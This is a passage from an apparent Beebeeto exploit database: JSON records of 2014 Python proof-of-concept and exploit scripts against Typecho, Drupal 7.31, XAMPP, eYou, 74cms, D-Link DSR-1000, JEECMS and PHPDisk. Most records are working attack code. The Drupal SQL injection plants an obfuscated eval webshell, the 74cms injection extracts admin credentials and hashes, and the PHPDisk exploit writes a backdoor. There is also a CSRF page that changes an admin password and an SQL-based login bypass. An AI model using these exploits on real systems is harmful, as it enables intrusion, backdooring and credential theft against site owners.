verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "emblog include/lib/js/uploadify/uploadify.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Emlog", "id": "poc-2014-0103", "layer4_protocol": null}
{"create_date": "2014-10-22 14:24:25", "name": "Typecho 0.9(13.12.12) CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e Exploit", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "CSRF", "tag": "Typecho\u6f0f\u6d1e,CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e,/profile.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0102',\r\n 'name': 'Typecho 0.9(13.12.12) CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e Exploit',\r\n 'author': '\u96f7\u8702',\r\n 'create_date': '2014-10-22',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Typecho',\r\n 'vul_version': ['0.9'],\r\n 'type': 'Cross Site Request Forgery',\r\n 'tag': ['Typecho\u6f0f\u6d1e', 'CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e', '/profile.php'],\r\n 'desc': '''\r\n http://typecho/admin/profile.php page, Change password form CSRF vul.\r\n http://typecho/admin/themes.php, We can write the PHP Backdoor in this page.\r\n ''',\r\n 'references': ['http://www.hackersoul.com/typecho/ff0000-hsdb-0002.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n verify_url = args['options']['target'] + '/index.php/action/users-profile'\r\n if args['options']['verbose']:\r\n print '[*] Generation: ' + verify_url\r\n temp = '''\r\n <div style=\"display: none;\">\r\n <form action=\"%s\" method=\"post\" name=\"ff0000team\" enctype=\"application/x-www-form-urlencoded\">\r\n <input type=\"hidden\" name=\"password\" value=\"beebeeto\"/>\r\n <input type=\"hidden\" name=\"confirm\" value=\"beebeeto\" />\r\n <input name=\"do\" type=\"hidden\" value=\"password\" />\r\n <button type=\"submit\"></button>\r\n </form>\r\n </div>\r\n <script>\r\n setTimeout(\"document.ff0000team.submit()\", 2000);\r\n </script>\r\n ''' % verify_url\r\n print '[*] Copy code: ' + temp\r\n print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok'\r\n return args\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://typecho/admin/profile.php page, Change password form CSRF vul.\r\nhttp://typecho/admin/themes.php, We can write the PHP Backdoor in this page.", "app_name": "Typecho", "id": "poc-2014-0102", "layer4_protocol": null}
{"create_date": "2014-10-21 21:39:38", "name": "Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "Ricter", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "Drupal\u6f0f\u6d1e,\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,PHP,GETSHELL", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n# \u6f0f\u6d1e\u5206\u6790\uff1ahttps://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6\r\n\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0100',\r\n 'name': 'Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit',\r\n 'author': 'Ricter',\r\n 'create_date': '2014-10-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Drupal',\r\n 'vul_version': ['<=7.31'],\r\n 'type': 'Code Execution',\r\n 'tag': ['Drupal\u6f0f\u6d1e', '\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'PHP', 'GETSHELL'],\r\n 'desc': '''\r\n Drupal 7.31 /includes/database/database.inc\u5728\u5904\u7406IN\u8bed\u53e5\u65f6\uff0c\u5c55\u5f00\u6570\u7ec4\u65f6key\u5e26\u5165SQL\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165\uff0c\r\n \u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u3001\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u5229\u7528\u7279\u6027\u4e5f\u53ef getshell\u3002\r\n ''',\r\n 'references': ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'\r\n payload = \"name[0;insert into menu_router (path, page_callback, access_callback, \" \\\r\n \"include_file, load_functions, to_arg_functions, description) values ('<\" \\\r\n \"?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '\" \\\r\n \"modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo\" \\\r\n \"rm_id=user_login_block\"\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + url\r\n print '[*] POST Content: ' + payload\r\n\r\n urllib2.urlopen(url, data=payload)\r\n request = urllib2.Request(webshell_url, data=\"e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);\")\r\n response = urllib2.urlopen(request).read()\r\n\r\n if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n args['poc_ret']['Webshell'] = webshell_url\r\n args['poc_ret']['Webshell_PWD'] = 'e'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n verify = exploit\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Drupal 7.31 /includes/database/database.inc\u5728\u5904\u7406IN\u8bed\u53e5\u65f6\uff0c\u5c55\u5f00\u6570\u7ec4\u65f6key\u5e26\u5165SQL\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165\uff0c\u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u3001\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u5229\u7528\u7279\u6027\u4e5f\u53ef getshell\u3002\r\n# \u6f0f\u6d1e\u5206\u6790\uff1ahttps://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6", "app_name": "Drupal", "id": "poc-2014-0100", "layer4_protocol": null}
{"create_date": "2014-10-21 16:40:27", "name": "xampp 1.7.3 /xampp/showcode.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "xampp\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/xampp/showcode.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0098',\r\n 'name': 'xampp 1.7.3 /xampp/showcode.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'xampp',\r\n 'vul_version': ['1.7.3'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['xampp\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/xampp/showcode.php', 'php'],\r\n 'desc': 'xampp <=1.7.3 has a file disclosure Vul. attacker can read any files on web server.',\r\n 'references': ['http://www.exploit-db.com/exploits/15370/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/xampp/showcode.php/c:boot.ini?showcode=1'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"<textarea cols='100' rows='10'>[boot loader]\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "xampp <=1.7.3 has a file disclosure Vul. attacker can read any files on web server.", "app_name": "XAMPP", "id": "poc-2014-0098", "layer4_protocol": null}
{"create_date": "2014-10-21 16:34:25", "name": "eYou v3 /user/send_queue/listCollege.php \u8def\u5f84\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/listCollege.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0097',\r\n 'name': 'eYou v3 /user/send_queue/listCollege.php \u8def\u5f84\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-10-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'eYou',\r\n 'vul_version': ['v3'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['eYou\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/listCollege.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://sebug.net/vuldb/ssvid-62693',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/user/send_queue/listCollege.php'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n res = re.compile(r'supplied argument is not a valid MySQL result resource in <b>(.*)</b> on line')\r\n match = res.findall(content)\r\n if match:\r\n if '<b>Warning</b>:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "eYou", "id": "poc-2014-0097", "layer4_protocol": null}
{"create_date": "2014-10-21 15:59:29", "name": "74cms V3.4 /plus/ajax_officebuilding.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "74cms\u6f0f\u6d1e,SQL\u6ce8\u5165,/plus/ajax_officebuilding.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0093',\r\n 'name': '74cms V3.4 /plus/ajax_officebuilding.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n 'author': '\u5927\u5b69\u5c0f\u5b69',\r\n 'create_date': '2014-10-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '74cms',\r\n 'vul_version': ['V3.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['74cms\u6f0f\u6d1e', 'SQL\u6ce8\u5165', '/plus/ajax_officebuilding.php', 'php'],\r\n 'desc': '74cms V3.4.20140530 /plus/ajax_officebuilding.php\u6587\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-063225',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/plus/ajax_officebuilding.php?act=key&key=asd%\u9326%27%20uniounionn%20selselectect\"\r\n \"%201,2,3,md5(7836457),5,6,7,8,9%23\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if '3438d5e3ead84b2effc5ec33ed1239f5' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n vul_url = args['options']['target'] + \"/plus/ajax_officebuilding.php\"\r\n paload1 = (\"?act=key&key=asd%\u9326%27%20uniounionn%20selselectect%201,2,3,admin_name,5,6,7,pwd,9%20from\"\r\n \"%20qs_admin%20LIMIT%201%23\")\r\n paload2 = (\"?act=key&key=asd%\u9326%27%20uniounionn%20selselectect%201,2,3,pwd_hash,5,6,7,8,9%20from%20\"\r\n \"qs_admin%20LIMIT%201%23\")\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + vul_url\r\n request = urllib2.Request(vul_url + paload1)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n pattern = re.compile(r'.*?<a[^>]*?>(?P<username>[^<>]*?)</a><span>(?P<password>[^<>]*?)</span>',re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n else:\r\n username = match.group('username').strip()\r\n password = match.group('password').strip()\r\n request = urllib2.Request(vul_url + paload2)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n pattern = re.compile(r'.*?<a[^>]*?>(?P<pwdhash>[^<>]*?)</a>',re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n else:\r\n passwordhash = match.group('pwdhash').strip()\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n args['poc_ret']['PasswordHash'] = passwordhash\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "74cms V3.4.20140530 /plus/ajax_officebuilding.php\u6587\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "74cms", "id": "poc-2014-0093", "layer4_protocol": null}
{"create_date": "2014-10-21 11:16:58", "name": "D-Link DSR-1000 v1.08B77 Authentication Bypass POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "e3rp4y", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "D-Link\u6f0f\u6d1e,Authentication Bypass,SQL Injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import forgeheaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0090',\r\n 'name': 'D-Link DSR-1000 v1.08B77 Authentication Bypass POC',\r\n 'author': 'e3rp4y',\r\n 'create_date': '2014-10-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'D-Link',\r\n 'vul_version': ['< Firmware v1.08B77'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['D-Link\u6f0f\u6d1e', 'Authentication Bypass', 'SQL Injection'],\r\n 'desc': 'D-Link DSR-1000\u8ba4\u8bc1SQL\u6ce8\u5165\u6f0f\u6d1e, \u53ef\u514d\u5bc6\u7801\u767b\u5f55\u8def\u7531\u8bbe\u5907',\r\n 'references': ['http://www.exploit-db.com/papers/30061/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n ua = forgeheaders.Linux().randomly_get()\r\n headers = {\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Origin': args['options']['target'],\r\n 'Referer': args['options']['target'] + '/',\r\n 'User-Agent': ua}\r\n\r\n url = args['options']['target'] + 'platform.cgi'\r\n resp = requests.post(\r\n url,\r\n headers=headers,\r\n data={'thispage': 'index.htm',\r\n 'Users.UserName': 'admin',\r\n 'Users.Password': \"' or 'a'='a\",\r\n 'button.login.Users.deviceStatus': 'Login',\r\n 'Login.userAgent': ua})\r\n\r\n if resp.status_code != 200:\r\n args['success'] = False\r\n return args\r\n\r\n if 'title=\"Continue\"' not in resp.text and \\\r\n 'Logout' not in resp.text:\r\n args['success'] = False\r\n return args\r\n\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "D-Link DSR-1000\u8ba4\u8bc1SQL\u6ce8\u5165\u6f0f\u6d1e, \u53ef\u514d\u5bc6\u7801\u767b\u5f55\u8def\u7531\u8bbe\u5907", "app_name": "D-LINK", "id": "poc-2014-0090", "layer4_protocol": null}
{"create_date": "2014-10-21 10:52:24", "name": "JEECMS /download.jspx Arbitrary File Download POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "flsf", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "JEECMS\u6f0f\u6d1e,/download.jspx,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0088',\r\n 'name': 'JEECMS /download.jspx Arbitrary File Download POC',\r\n 'author': 'flsf',\r\n 'create_date': '2014-10-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'JEECMS',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['JEECMS\u6f0f\u6d1e', '/download.jspx', 'Arbitrary File Download'],\r\n 'desc': '/download.jspx \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d,fpath\u53cafilename\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-077960',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if 'WEB-INF/config/' in content and 'contextConfigLocation' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "/download.jspx \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d,fpath\u53cafilename\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6", "app_name": "JEECMS", "id": "poc-2014-0088", "layer4_protocol": null}
{"create_date": "2014-10-20 17:49:50", "name": "PHPDisk 2.5 /phpdisk_del_process.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "PHPDisk E_Core \u6f0f\u6d1e,\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/phpdisk_del_process.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0087',\r\n 'name': 'PHPDisk 2.5 /phpdisk_del_process.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2014-10-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPDisk',\r\n 'vul_version': ['2.5'],\r\n 'type': 'Code Execution',\r\n 'tag': ['PHPDisk E_Core \u6f0f\u6d1e', '\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/phpdisk_del_process.php'],\r\n 'desc': '\u5229\u7528\u73af\u5883\u6bd4\u8f83\u9e21\u808b\uff0c\u4ee3\u7801\u6267\u884c\u9700\u8981\u5173\u95edshort_open_tag',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-057665',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n del_url = args['options']['target'] + '/phpdisk_del_process.php?a'\r\n shell_url = args['options']['target'] + '/system/delfile_log.php'\r\n data = {\r\n 'pp': 'system/install.lock',\r\n 'file_id': '<?php echo md5(233333);?>#',\r\n 'safe': 'a'\r\n }\r\n post_data = urllib.urlencode(data)\r\n request = urllib2.Request(del_url, post_data)\r\n response = urllib2.urlopen(request)\r\n shell_request = urllib2.Request(shell_url)\r\n shell_response = urllib2.urlopen(shell_request)\r\n content = shell_response.read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + del_url\r\n print '[*] Request URL2: ' + shell_url\r\n match = re.search('fb0b32aeafac4591c7ae6d5e58308344', content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = shell_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n del_url = args['options']['target'] + '/phpdisk_del_process.php?a'\r\n shell_url = args['options']['target'] + '/system/delfile_log.php'\r\n data = {\r\n 'pp': 'system/install.lock',\r\n 'file_id': '<?php echo md5(233333);eval($_POST[bb2];?>#',\r\n 'safe': 'a'\r\n }\r\n post_data = urllib.urlencode(data)\r\n request = urllib2.Request(del_url, post_data)\r\n response = urllib2.urlopen(request)\r\n shell_request = urllib2.Request(shell_url)\r\n shell_response = urllib2.urlopen(shell_request)\r\n content = shell_response.read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + del_url\r\n print '[*] Request URL2: ' + shell_url\r\n match = re.search('fb0b32aeafac4591c7ae6d5e58308344', content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = shell_url\r\n args['poc_ret']['content'] = '<?php echo md5(233333);eval($_POST[bb2];?>'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5229\u7528\u73af\u5883\u6bd4\u8f83\u9e21\u808b\uff0c\u4ee3\u7801\u6267\u884c\u9700\u8981\u5173\u95edshort_open_tag", "app_name": "PHPDisk", "id": "poc-2014-0087", "layer4_protocol": null}
{"create_date": "2014-10-19 16:26:45", "name": "Dedecms v5.5 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Dedecms\u4fe1\u606f\u6cc4\u9732,Dedecms\u7206\u8def\u5f84,5.5\u8def\u5f84\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0084',\r\n 'name': 'Dedecms v5.5 full Path Disclosure Vulnerability POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-10-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Dedecms',\r\n 'vul_version': ['5.5'],\r\n 'type': 'Information Disclosure',\r\n 